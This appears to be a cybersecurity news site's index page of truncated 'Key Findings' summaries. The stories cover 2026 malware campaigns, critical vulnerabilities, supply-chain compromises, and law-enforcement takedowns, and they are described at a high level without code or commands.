ALL POSTS

Key Findings GlassWorm campaign evolved to deliver multi-stage malware framework with data theft and remote access capabilities Operators use Solana blockchain transactions as dead drop resolvers to hide command-and-control infrastructure Malware includes hardware wallet phishing targeting Ledger and Trezor devices with fake recovery phrase prompts Chrome extension masquerading as "Google Docs Offline" steals browser data, cookies, and monitors cryptocurrency exchange session

Key Findings FCC bans all new foreign-made consumer routers from U.S. market effective immediately unless granted Conditional Approval by DoD or DHS Foreign routers pose unacceptable supply chain vulnerabilities and severe cybersecurity risks to critical infrastructure and American citizens Chinese state-sponsored actors including Volt Typhoon, Flax Typhoon, and Salt Typhoon have exploited compromised foreign routers to target U.S. critical infrastructure Ban applies only to

Key Findings Seven malicious npm packages tracked as "Ghost campaign" designed to steal cryptocurrency wallets and credentials Packages use sophisticated social engineering tactics including fake installation logs and sudo password phishing Attack chain culminates in remote access trojan capable of harvesting sensitive data and awaiting attacker commands Activity shares overlap with GhostClaw campaign, suggesting possible connection between threat actors Packages published un

Key Findings Campaign named FAUX#ELEVATE targets French-speaking corporate environments using fake resume documents delivered via phishing emails Heavily obfuscated VBScript files contain only 266 lines of executable code out of 224,471 total lines, with the rest being junk comments to evade detection Attack completes full infection chain in approximately 25 seconds, from initial execution through credential exfiltration Malware exclusively targets domain-joined enterprise ma

Key Findings Citrix released patches for two critical NetScaler vulnerabilities affecting ADC and Gateway products CVE-2026-3055 (CVSS 9.3) is a memory overread flaw allowing unauthenticated attackers to leak sensitive data from appliance memory Vulnerability only affects systems configured as SAML Identity Providers, not default configurations CVE-2026-4368 (CVSS 7.7) is a race condition causing session mix-ups in gateway and AAA server deployments No public exploits current

Key Findings 26-year-old Russian citizen Aleksei Olegovich Volkov sentenced to 81 months in prison for ransomware facilitation Volkov operated as initial access broker, providing unauthorized network access to ransomware groups including Yanluowang Facilitated dozens of attacks causing over $9 million in confirmed losses and $24 million in intended losses Arrested in Italy January 2024, extradited to U.S., pleaded guilty November 2025 Must pay $9.1 million in restitution to v

Key Findings Hundreds of organizations compromised through AI-generated phishing campaign leveraging Railway cloud platform Attackers achieved massive scale increase starting March 3, with 50+ new compromises daily as of late March Campaign exploits Microsoft device authentication flow, granting 90-day OAuth tokens without passwords or MFA Affected sectors include construction, law, nonprofits, real estate, manufacturing, finance, healthcare, and government Huntress identifie

Key Findings Eight validated attack vectors discovered across AWS Bedrock environments, spanning log manipulation, knowledge base compromise, agent hijacking, flow injection, guardrail degradation, and prompt poisoning Attack chains begin with low-level permissions and escalate to reach critical enterprise assets including Salesforce, SharePoint, Active Directory, and databases Knowledge bases and agents represent the highest-value targets due to their direct connectivity to

Key Findings North Korean threat actors tracked as WaterPlum are distributing StoatWaffle malware through malicious VS Code projects using the "tasks.json" auto-run feature The malware automatically executes when any file in a project folder is opened, with downloads occurring regardless of operating system StoatWaffle includes a credential stealer targeting browsers and a remote access trojan for command execution Attackers are targeting senior engineers, CTOs, and founders

Key Findings Single operator in China ran 373,000 fraudulent dark web sites offering CSAM and cybercrime services Operation Alice, led by German authorities with support from 23 countries, dismantled the network from March 9-19, 2026 Law enforcement seized 105 servers, identified 440 customers worldwide, and issued international arrest warrant for 35-year-old suspect Operator earned over €345,000 from roughly 10,000 customers through fake "packages" priced between €17 and €21

Key Findings Exploitation velocity doubled in 2025, with new vulnerabilities weaponized within days while decade-old CVEs remain reliably exploited Identity systems became the primary attack surface, with compromised credentials enabling stealthy lateral movement and environment-wide control Approximately 25% of top exploited vulnerabilities targeted shared frameworks and libraries, amplifying blast radius across industries APT investigations and ransomware operations increas

Key Findings CISA added five critical vulnerabilities to its Known Exploited Vulnerabilities catalog, including three Apple flaws, one Craft CMS code injection, and one Laravel Livewire vulnerability Three Apple vulnerabilities are linked to active exploitation by the DarkSword iOS exploit kit Craft CMS flaws have been actively exploited in the wild to breach servers and steal data Laravel Livewire vulnerability is associated with Iran-nexus APT group MuddyWater Federal agenc

Key Findings Russian Intelligence Services-linked actors are conducting phishing campaigns targeting Signal and WhatsApp accounts of high-value targets including U.S. government officials, military personnel, politicians, and journalists Thousands of accounts have already been compromised worldwide through these operations Attackers bypass encryption by hijacking accounts rather than breaking encryption itself, using phishing to trick users into sharing verification codes or

Key Findings Oracle released an emergency patch for CVE-2026-21992, a critical remote code execution vulnerability in Identity Manager and Web Services Manager The flaw has a CVSS score of 9.8 and requires no authentication, allowing attackers to execute code over HTTP Affected versions are Identity Manager 12.2.1.4.0 and 14.1.2.1.0, plus Web Services Manager versions 12.2.1.4.0 and 14.1.2.1.0 Oracle classified the vulnerability as "easily exploitable" with low complexity No

Key Findings * Russian-aligned hackers targeting commercial messaging apps * Phishing campaigns compromising thousands of high-value accounts * Attacks do not break encryption, but exploit social engineering * Targets include government officials, military personnel, journalists * Methods involve tricking users into sharing verification codes or clicking malicious links Background Russian state-affiliated threat actors are conducting sophisticated phishing campaigns against p

Key Findings * TeamPCP cybercriminal group suspected behind supply chain attack * 47 npm packages compromised across multiple scopes * Self-propagating CanisterWorm uses ICP blockchain canister as command-and-control infrastructure * Attack leverages npm package postinstall hooks to execute malware * Worm can automatically spread using stolen npm authentication tokens * Decentralized C2 infrastructure makes takedown efforts difficult Background The supply chain attack targets

Key Findings * Critical remote code execution vulnerability in Langflow (CVE-2026-33017) * CVSS score: 9.3 * Exploited within 20 hours of advisory publication * Allows unauthenticated remote code execution via API endpoint * Affects all Langflow versions prior to 1.8.1 * Attackers can execute arbitrary Python code with full server privileges * Observed exploitation includes credential harvesting and potential supply chain compromise Background Langflow, an open-source AI plat

Key Findings * Trivy GitHub Actions repositories compromised for second time in a month * 75 out of 76 version tags force-pushed with malicious payload * Attacker aims to steal CI/CD secrets including cloud credentials, cryptocurrency wallets * Likely perpetrated by TeamPCP threat actor group * Compromise stems from incomplete mitigation of previous security incident Background The Trivy vulnerability scanner, maintained by Aqua Security, has experienced a significant securit

Key Findings Justice Department disrupted four botnets affecting 3 million devices Botnets responsible for over 300,000 DDoS attacks Infected devices include digital video recorders, web cameras, Wi-Fi routers, and TV boxes Operation involved international cooperation with Canada and Germany Botnets used for various cybercrime activities including extortion Background The Justice Department conducted a major cybersecurity operation targeting four significant botnets: Aisuru,

Key Findings * Coruna and DarkSword exploit kits target outdated iOS versions * Apple warns users to update iOS to prevent data theft * Exploit kits can compromise iPhones through malicious web content * Devices running latest iOS versions are protected * Multiple threat actors are utilizing these exploit techniques Background Apple has identified significant security vulnerabilities in older iOS versions that can be exploited by sophisticated web-based attack frameworks. The